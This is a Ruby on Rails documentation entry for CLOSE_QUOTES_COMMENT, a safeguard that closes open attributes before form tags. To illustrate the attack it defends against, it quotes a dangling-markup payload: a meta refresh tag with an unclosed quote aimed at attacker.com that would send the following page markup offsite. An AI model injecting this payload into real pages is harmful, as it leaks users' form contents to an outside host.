constant CLOSE_QUOTES_COMMENT

Ruby on Rails 7.2.3

Since v7.1.6

Available in: v7.1.6 v7.2.3 v8.0.4 v8.1.2

Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.

For example, an attacker might inject:

<meta http-equiv="refresh" content='0;URL=https://attacker.com?

The HTML following this tag, up until the next single quote would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.

Type at least 2 characters to search.

Use the arrow keys to navigate results, Enter to open one, Escape to close.

Keyboard shortcuts

/
Focus search
⌘K / Ctrl-K
Command palette
?
This help
Esc
Close